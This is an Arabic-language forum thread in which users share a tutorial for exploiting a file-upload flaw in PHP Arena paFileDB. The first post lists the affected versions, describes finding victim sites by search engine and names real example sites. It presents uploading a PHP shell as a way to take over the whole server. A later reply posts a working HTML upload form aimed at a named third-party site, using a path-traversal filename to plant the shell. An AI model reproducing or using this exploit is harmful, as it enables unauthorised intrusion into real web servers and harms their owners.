| | |||||||
![]() | ![]() | ![]() |
![]() | ![]() |

| | LinkBack | أدوات الموضوع | طريقة عرض الموضوع |
|
#1
| |||
| |||
| -------------------------------------------------------------------------------- <DIV align=center>بسم الله الرحمن الرحيم شرح ثغرة PHP Arena paFileDB وأستغلالها. ============ الثغرة تمكنك من رفع أي ملف على الموقع وبذلك نستطيع رفع شيل على الموقع وأختراق السيرفر بالكامل. ============ (البرامج المصابه) PHP Arena paFileDB 1.1.3 PHP Arena paFileDB 2.1.1 PHP Arena paFileDB 3.0 Beta 3.1 PHP Arena paFileDB 3.0 PHP Arena paFileDB 3.1 ============ أذهب إلى أي محرك بحث منثل جوجل وأكتب أيا من البرامج السابقة مثلا: PHP Arena paFileDB 3.1 راح تطلع لنا مواقع كثيرة نختار منها على سبيل المثال: http://www.truez.com/download نضيف عليه هالوصلة: includes/team/file.php ليصبح: http://www.truez.com/download/includes/team/file.php الأن ضع اللنك في المتصفح وأضغط أنتر: إذا طلع لك هكذا [ ] - [ ] - [ ] يعني الموقع مصاب بالثغرة. الأن لرفع ملف إلى الموقع نتبع الخطوات التالية: 1- نعمل مجلد على القرص C: ونسميه مثلا: Virus 2- الأن نضع بداخله الملف المراد نقله على الموقع ونسميه مثلا 777.php 3- الأن ننسخ هذا الكود ونضعه بملف txt ثم عند الحفظ نسميه Virus.html: ====================== ارجو الرد ياناس اخوكم اسود ![]() |
|
#2
| |||
| |||
| وشو النك اللي نحطه |
|
#3
| |||
| |||
| ننسخ هذا الكود أي كود يا غالي |
|
#4
| |||
| |||
| هاهو الكود <html><body> <form ENCTYPE="multipart/form-data" method="POST" action="http://www.aidecampingcar.com/pafiledb/includes/team/file.php"> <input name="userfile" TYPE="file"><br> <input name="userfile_name" TYPE="text" value="../../../uploads/777.php"><br> <input type="hidden" name="action" value="team"> <input type="hidden" name="tm" value="file"> <input type="hidden" name="file" value="upload"> <input type="hidden" name="upload" value="do"> <input type=submit name=submit value="doit"> </form> </body></html> مع تغيير الرابط |
|
#5
| |||
| |||
| و بعدين .... |
| مواقع النشر (المفضلة) |
| أدوات الموضوع | |
| طريقة عرض الموضوع | |
| |
-الدورات
التدريبية بجامعة نجران-